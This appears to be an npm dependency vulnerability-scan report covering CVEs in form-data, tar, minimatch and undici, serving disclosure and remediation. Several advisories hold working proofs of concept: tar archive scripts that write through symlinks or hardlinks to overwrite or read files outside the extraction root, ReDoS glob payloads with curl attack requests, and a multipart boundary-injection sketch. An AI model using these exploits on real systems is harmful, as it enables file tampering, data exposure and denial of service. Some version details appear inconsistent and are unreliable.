The file is now being served from the CMS's own domain to all visitors.

Video POC : https://drive.google.com/file/d/1bbuQnoJv_xjM_uvfjnstmTh07FB7VqGH/view?usp=sharing


critical: 1 high: 0 medium: 0 low: 0 form-data 4.0.2 (npm)

pkg:npm/form-data@4.0.2

critical 9.4: CVE-2025-7783 Use of Insufficiently Random Values

Affected range:  >=4.0.0 <4.0.4
Fixed version:   4.0.4
CVSS Score:      9.4
CVSS Vector:     CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
EPSS Score:      0.177%
EPSS Percentile: 39th
Description

Summary

form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:

  1. can observe other values produced by Math.random in the target application, and
  2. can control one field of a request made using form-data

Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a value that contains the boundary, letting them inject additional parameters into the request.

This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.

Details

The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347

An attacker who can predict the output of Math.random() can predict this boundary value and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to an improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application in order to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker -- including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data (such as a user-controlled webhook), in which case the attacker could observe the boundary values from those requests to recover the Math.random() outputs. A common example would be an x-request-id header added by the server. These headers are often used for distributed tracing, to correlate errors across the frontend and backend, and Math.random() is a reasonable source for such IDs (in fact, opentelemetry uses Math.random for this purpose).
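
The injection mechanics can be sketched without the library. Assuming the attacker has already recovered the boundary (the hard part, per the PRNG discussion above), embedding it inside a field value splits the body into an extra part. The boundary string and field names below are made-up stand-ins:

```javascript
// Sketch of multipart boundary injection (illustrative values only).
// Assumption: the attacker has recovered the PRNG state and thus knows the
// boundary the application's form-data instance will use next.
const boundary = 'predicted0123456789';

// "comment" is the one field the attacker legitimately controls. Its value
// closes the current part and opens a brand-new "role" part.
const attackerValue = [
  'harmless text',
  `--${boundary}`,
  'Content-Disposition: form-data; name="role"',
  '',
  'admin'
].join('\r\n');

// The application believes it is sending a single "comment" field:
const body = [
  `--${boundary}`,
  'Content-Disposition: form-data; name="comment"',
  '',
  attackerValue,
  `--${boundary}--`,
  ''
].join('\r\n');

// A receiver splitting on the boundary sees TWO fields:
const names = body
  .split(`--${boundary}`)
  .map(part => (part.match(/name="([^"]+)"/) || [])[1])
  .filter(Boolean);
console.log(names);   // [ 'comment', 'role' ]
```

Because the injected part is syntactically valid multipart, a real parser sees it the same way; whether the injected value appends or overwrites then depends on the receiver's duplicate-field handling, as noted under Impact.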

PoC

PoC here: https://github.com/benweissmann/CVE-2025-7783-poc

Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).

Impact

For an application to be vulnerable, it must:

  • Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)
  • Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values.

If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.


critical: 0 high: 3 medium: 0 low: 0 tar 7.5.7 (npm)

pkg:npm/tar@7.5.7

high 8.2: CVE-2026-31802 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range:  <=7.5.10
Fixed version:   7.5.11
CVSS Score:      8.2
CVSS Vector:     CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N
EPSS Score:      0.007%
EPSS Percentile: 1st
Description

Summary

tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction.

Details

The extraction logic in Unpack[STRIPABSOLUTEPATH] validates .. segments against a resolved path that still uses the original drive-relative value, and only afterwards rewrites the stored linkpath to the stripped value.

What happens with linkpath: "C:../../../target.txt":

  1. stripAbsolutePath() removes C: and rewrites the value to ../../../target.txt.
  2. The escape check resolves using the original pre-stripped value, so it is treated as in-bounds and accepted.
  3. Symlink creation uses the rewritten value (../../../target.txt) from nested path a/b/l.
  4. Writing through the extracted symlink overwrites the outside file (../target.txt).

This is reachable in standard usage (tar.x({ cwd, file })) when extracting attacker-controlled tar archives.

PoC

Tested on Arch Linux with tar@7.5.10.

PoC script (poc.cjs):

const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({
  path: 'a/b/l',
  type: 'SymbolicLink',
  linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Run:

node poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt

Observed output:

PWNED
../../../target.txt
lrwxrwxrwx - joshuavr  7 Mar 18:37 a/b/l -> ../../../target.txt
.rw-r--r-- 6 joshuavr  7 Mar 18:37 ../target.txt

PWNED confirms outside file content overwrite. readlink and ls -l confirm the extracted symlink points outside the extraction directory.

Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios:

  • CLI tools unpacking untrusted tarballs into a working directory
  • build/update pipelines consuming third-party archives
  • services that import user-supplied tar files

high 8.2: CVE-2026-29786 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range:  <=7.5.9
Fixed version:   7.5.10
CVSS Score:      8.2
CVSS Vector:     CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L
EPSS Score:      0.016%
EPSS Percentile: 3rd
Description

Summary

tar (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction.

Details

The extraction logic in Unpack[STRIPABSOLUTEPATH] checks for .. segments before stripping absolute roots.

What happens with linkpath: "C:../target.txt":

  1. Split on / gives ['C:..', 'target.txt'], so parts.includes('..') is false.
  2. stripAbsolutePath() removes C: and rewrites the value to ../target.txt.
  3. Hardlink creation resolves this against extraction cwd and escapes one directory up.
  4. Writing through the extracted hardlink overwrites the outside file.

This is reachable in standard usage (tar.x({ cwd, file })) when extracting attacker-controlled tar archives.
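
The check-ordering bug described above can be illustrated in a few lines (an assumed shape of the logic, not tar's verbatim source):

```javascript
// '..' detection runs on the '/'-split segments of the ORIGINAL linkpath,
// and the drive prefix is stripped only afterwards.
const linkpath = 'C:../target.txt';

const parts = linkpath.split('/');
console.log(parts);                        // [ 'C:..', 'target.txt' ]
console.log(parts.includes('..'));         // false -- the escape check passes

// A stripAbsolutePath-style rewrite then removes the 'C:' prefix:
const stripped = linkpath.replace(/^[A-Za-z]:/, '');
console.log(stripped);                     // '../target.txt'
console.log(stripped.split('/').includes('..'));  // true, but checked too late
```

Running the segment check on the post-strip value (or resolving and containment-checking the final path) closes the gap.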

PoC

Tested on Arch Linux with tar@7.5.9.

PoC script (poc.cjs):

const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(process.cwd(), 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Run:

cd test-workspace
node poc.cjs && ls -l ../target.txt

Observed output:

PWNED
-rw-r--r-- 2 joshuavr joshuavr 6 Mar  4 19:25 ../target.txt

PWNED confirms outside file content overwrite. Link count 2 confirms the extracted file and ../target.txt are hardlinked.

Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios:

  • CLI tools unpacking untrusted tarballs into a working directory
  • build/update pipelines consuming third-party archives
  • services that import user-supplied tar files

high 7.1: CVE-2026-26960 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range:  <7.5.8
Fixed version:   7.5.8
CVSS Score:      7.1
CVSS Vector:     CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
EPSS Score:      0.012%
EPSS Percentile: 2nd
Description

Summary

tar.extract() in Node tar allows an attacker-controlled archive to create a hardlink inside the extraction directory that points to a file outside the extraction root, using default options.

This enables arbitrary file read and write as the extracting user (no root, no chmod, no preservePaths).

Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive.

Details

The bypass chain uses two symlinks plus one hardlink:

  1. a/b/c/up -> ../..
  2. a/b/escape -> c/up/../..
  3. exfil (hardlink) -> a/b/escape/<target-relative-to-parent-of-extract>

Why this works:

  • Linkpath checks are string-based and do not resolve symlinks on disk for hardlink target safety.

    • See STRIPABSOLUTEPATH logic in:
      • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:255
      • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:268
      • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:281
  • Hardlink extraction resolves target as path.resolve(cwd, entry.linkpath) and then calls fs.link(target, destination).

    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:566
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:567
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:703
  • Parent directory safety checks (mkdir + symlink detection) are applied to the destination path of the extracted entry, not to the resolved hardlink target path.

    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:617
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:619
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:27
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:101

As a result, exfil is created inside extraction root but linked to an external file. The PoC confirms shared inode and successful read+write via exfil.

PoC

PoC script: hardlink.js

Environment used for validation:

  • Node: v25.4.0
  • tar: 7.5.7
  • OS: macOS Darwin 25.2.0
  • Extract options: defaults (tar.extract({ file, cwd }))

Steps:

  1. Prepare/locate a tar module. If require('tar') is not available locally, set TAR_MODULE to an absolute path to a tar package directory.

  2. Run:

TAR_MODULE="$(cd '../tar-audit-setuid - CVE/node_modules/tar' && pwd)" node hardlink.js

  3. Expected vulnerable output (key lines):

same_inode=true
read_ok=true
write_ok=true
result=VULNERABLE

Interpretation:

  • same_inode=true: extracted exfil and external secret are the same file object.
  • read_ok=true: reading exfil leaks external content.
  • write_ok=true: writing exfil modifies external file.

Impact

Vulnerability type:

  • Arbitrary file read/write via archive extraction path confusion and link resolution.

Who is impacted:

  • Any application/service that extracts attacker-controlled tar archives with Node tar defaults.
  • Impact scope is the privileges of the extracting process user.

Potential outcomes:

  • Read sensitive files reachable by the process user.
  • Overwrite writable files outside extraction root.
  • Escalate impact depending on deployment context (keys, configs, scripts, app data).

critical: 0 high: 3 medium: 0 low: 0 minimatch 3.1.2 (npm)

pkg:npm/minimatch@3.1.2

high 8.7: CVE-2026-26996 Inefficient Regular Expression Complexity

Affected range:  <3.1.3
Fixed version:   10.2.1
CVSS Score:      8.7
CVSS Vector:     CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score:      0.052%
EPSS Percentile: 16th
Description

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.


PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) — exponential.
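
The compiled shape can be reproduced without minimatch; a small-N sketch (assumed equivalent regex, kept small so it returns quickly -- the advisory's N=15 case takes seconds):

```javascript
// Rebuild the regex shape minimatch emits for N consecutive '*' wildcards:
// each '*' becomes a lazy [^/]*? group, followed by the literal 'X' that the
// input lacks.
function compile(nStars) {
  return new RegExp('^' + '[^/]*?'.repeat(nStars) + 'X$');
}

const re = compile(6);
const input = 'a'.repeat(12);            // no 'X' anywhere
const t0 = process.hrtime.bigint();
const matched = re.test(input);          // engine tries every split before failing
const ms = Number(process.hrtime.bigint() - t0) / 1e6;
console.log({ matched, ms: ms.toFixed(2) });   // matched: false
```

Raising `nStars` and the input length grows the work combinatorially, exactly as the C(N+M, N) formula predicts.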

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

high 7.5: CVE-2026-27904 Inefficient Regular Expression Complexity

Affected range:  <3.1.4
Fixed version:   3.1.4
CVSS Score:      7.5
CVSS Vector:     CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score:      0.052%
EPSS Percentile: 16th
Description

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.


Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern            Generated regex
*(a|b)             /^(?:a|b)*$/
*(*(a|b))          /^(?:(?:a|b)*)*$/
*(*(*(a|b)))       /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b))))    /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern            Input       Time
*(*(a|b))          a x30 + z   ~68,000ms
*(*(*(a|b)))       a x20 + z   ~124,000ms
*(*(*(*(a|b))))    a x25 + z   ~116,000ms
*(a|a)             a x25 + z   ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth  Pattern            Time
1      *(a|b)             0ms
2      *(*(a|b))          4ms
3      *(*(*(a|b)))       270ms
4      *(*(*(*(a|b))))    115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.


PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.


Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

high 7.5: CVE-2026-27903 Inefficient Algorithmic Complexity

Affected range:  <3.1.3
Fixed version:   3.1.3
CVSS Score:      7.5
CVSS Vector:     CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score:      0.054%
EPSS Percentile: 16th
Description

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.


Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars)  Pattern size  Time
7              36 bytes      ~154ms
9              46 bytes      ~1.2s
11             56 bytes      ~5.4s
12             61 bytes      ~9.7s
13             66 bytes      ~15.9s
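
Those timings track the binomial call count directly; a quick sanity check of C(30, k) for the measured k values (computed here, not taken from the advisory):

```javascript
// Exact binomial coefficients via the multiplicative formula (BigInt, so
// there is no floating-point error at these sizes).
function binom(n, k) {
  let r = 1n;
  for (let i = 1n; i <= BigInt(k); i++) {
    r = (r * (BigInt(n) - BigInt(k) + i)) / i;   // exact at every step
  }
  return r;
}

// Predicted matchOne() invocations for n=30 path segments:
for (const k of [7, 9, 11, 12, 13]) {
  console.log(`k=${k}: C(30,${k}) = ${binom(30, k)}`);
}
```

The ratio C(30,9)/C(30,7) is about 7, matching the ~154ms → ~1.2s step in the table; each added globstar multiplies the call count by roughly the number of remaining segments divided by k.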

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

critical: 0 high: 3 medium: 0 low: 0 undici 6.21.2 (npm)

pkg:npm/undici@6.21.2

high 7.5: CVE-2026-2229 Uncaught Exception

Affected range:  <6.24.0
Fixed version:   6.24.0
CVSS Score:      7.5
CVSS Vector:     CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score:      0.108%
EPSS Percentile: 29th
Description

Impact

The undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the server_max_window_bits parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range server_max_window_bits value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.

The vulnerability exists because:

  1. The isValidClientWindowBits() function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15
  2. The createInflateRaw() call is not wrapped in a try-catch block
  3. The resulting exception propagates up through the call stack and crashes the Node.js process

Patches

Patched in undici 6.24.0. Users should upgrade to 6.24.0 or later.

Workarounds

None documented; upgrading to a patched version is the only known remediation.

high 7.5: CVE-2026-1528 Improper Validation of Specified Quantity in Input

Affected range: >=6.0.0, <6.24.0
Fixed version: 6.24.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.066%
EPSS Percentile: 20th percentile
Description

Impact

A server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process.
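The overflow class described here can be illustrated with plain Buffer arithmetic (an illustrative sketch, not undici's actual parser code): JavaScript's shift operators work modulo 32, so composing a 64-bit frame length from two 32-bit reads without BigInt silently collapses the value.

```javascript
// A 64-bit payload length of 2^63 - 1 as it would appear on the wire
// (big-endian). Hypothetical parsing sketch, not undici internals.
const buf = Buffer.alloc(8)
buf.writeBigUInt64BE(2n ** 63n - 1n)

// Correct: a BigInt read preserves the full 64-bit value.
const correct = buf.readBigUInt64BE(0)

// Broken: << operates modulo 32 in JS, so `hi << 32` is just `hi`,
// and the "length" becomes hi + lo instead of hi * 2^32 + lo.
const hi = buf.readUInt32BE(0)
const lo = buf.readUInt32BE(4)
const broken = (hi << 32) + lo

console.log(correct) // 9223372036854775807n
console.log(broken)  // 6442450942
```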

Patches

Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.

Workarounds

